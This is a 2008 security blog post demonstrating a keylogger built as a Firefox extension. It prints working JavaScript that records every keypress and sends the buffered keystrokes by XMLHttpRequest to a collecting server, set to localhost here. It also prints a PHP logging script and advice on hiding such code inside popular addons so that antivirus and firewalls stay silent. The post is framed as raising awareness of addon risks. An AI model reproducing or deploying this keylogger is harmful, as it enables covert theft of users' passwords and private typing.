Wednesday, April 16, 2008

Firefox Addons own ya - Keylogger POC

| Armando Romeo |
This was a project I was meant to carry on last year when I started learning the capabilities of coding in the Gecko environment to create Firefox addons.
I was working to create an addon capable of digitally sign documents easily from the web browser interface using certificates.
For this post I prepared a proof of concept to demonstrate how powerful coding Addons can be, and how malicious code can be embedded in your Firefox without Antivirus or Firewall even notice it.


Now attention here, forget the pic above.
Not anyone is aware of this capabilities and people tend to install any kind of addon/style on Firefox from untrusted ( or unverified ) third parties.
Most of the firefox addons you find on the net is not signed and almost all of them are not validated or checked for malicious code.

My small POC consists of a keylogger written in javascript and embedded into Firefox browser in form of extension. This code can be injected into any known/famous addon without even noticing it since it creates no warnings at Antiviruses (it's just legal javascript) and no warning from Firewalls since the logs of the keystrokes are sent through Firefox on port 80 to a malicious server.



Firewalls allow Firefox on port 80 if you want to browse the internet, so no way to understand what's going on under the hood unless you track all the packets going out of your internet interface.

The POC is an installable extension that once installed it doesn't add anything to the Firefox appearance.

Get it here

It adds an event listener for the event keypress to the document object, buffers the keystrokes and then send them to a server collecting them.

Moreover no warning of an external page loading is showed in the browser status bar, the call is handled through XMLHttpRequest and not using iframes.

To test the proof of concept I created a server side php file that listen for keystrokes and save them on file. The file is log.php in the above zip

3 lines of code as simple as:

$fh=fopen("log.txt","a+");
fwrite($fh,$_GET['c']);
fclose($fh);

This must be put in localhost under folder "hackerscenter" and called log.php. So you will need a local web server in order to test it.

That is http://localhost/hackerscenter/log.php must be found by the extension.

The most important part of the keylogger is this piece of javascript code (the content of the extension):

document.addEventListener("keypress",onkey,false);
var key_str='';

function onkey(e) {

key_str+=String.fromCharCode(e.charCode);

if (key_str.length>50) {

http=new XMLHttpRequest();
http.open("GET","http://localhost/hackerscenter/log.php?c=" + key_str,true);
http.send(null);
key_str='';
}

}

On first line we add an event listener for the keypress event. Everytime a key will be pressed a call to onkey() function will be made and the object event passed.

Through the event object event we retrieve the character pressed with event.charCode.
We buffer the keystrokes until we reach 50 characters and then make a call to our logger through XMLHttpRequest().
Once the buffer is sent it gets flushed. Small, easy and powerful.


There are mainly 2 ways to embed malicious code into Firefox.
One uses the above plain javascript that anyone can read since firefox extension .xpi is just a .zip (if you rename it to .zip you can see the actual content) and the modules are just xml and javascript.
This is the way I followed for this quick POC.

The other option is to have our javascript load a C++ or Java library and have these libraries do the dirty job.

In this case reverse engineering of the library would be required, not always an easy task so this method adds more stealthiness to the code.
There are many examples on the net for loading a C++ dll from javascript in the
Gecko environment.
In the end this is how Firefox is built: styles and the appearance are rendered through xul (powerful but easy xml language for application GUI) and css and more complicated functions are left to external compiled libraries loaded and called by javascript code.

Probably this is not a completely new invention by me, but this should be the demonstration that this is easy to do and that Firefox addons are no-less than executable.

I would add that since external requests are carried through Firefox it is even better(worse) than using an executable for which any application firewall/antivirus would complain about.

Note: to test the above in a development firefox environment without using your everyday browser follow these easy steps:
1. close all firefox windows
2. from shell c:\mozilla dir\firefox.exe -p
3. create a new profile and launch it
4. install and test the POC from within this new firefox profile

To use back your previous default firefox profile, close all windows and repeat step 2 choosing to run firefox using your default profile.


My research goes on as malicious code into Firefox addons can harm web applications, defeat CSRF defenses and play with cookies.
I'm still playing with it, so you now know how I will spend my next saturday night. Enjoy...and don't forget to add your comment if you like our prizes to the best commenter

Free Security Magazines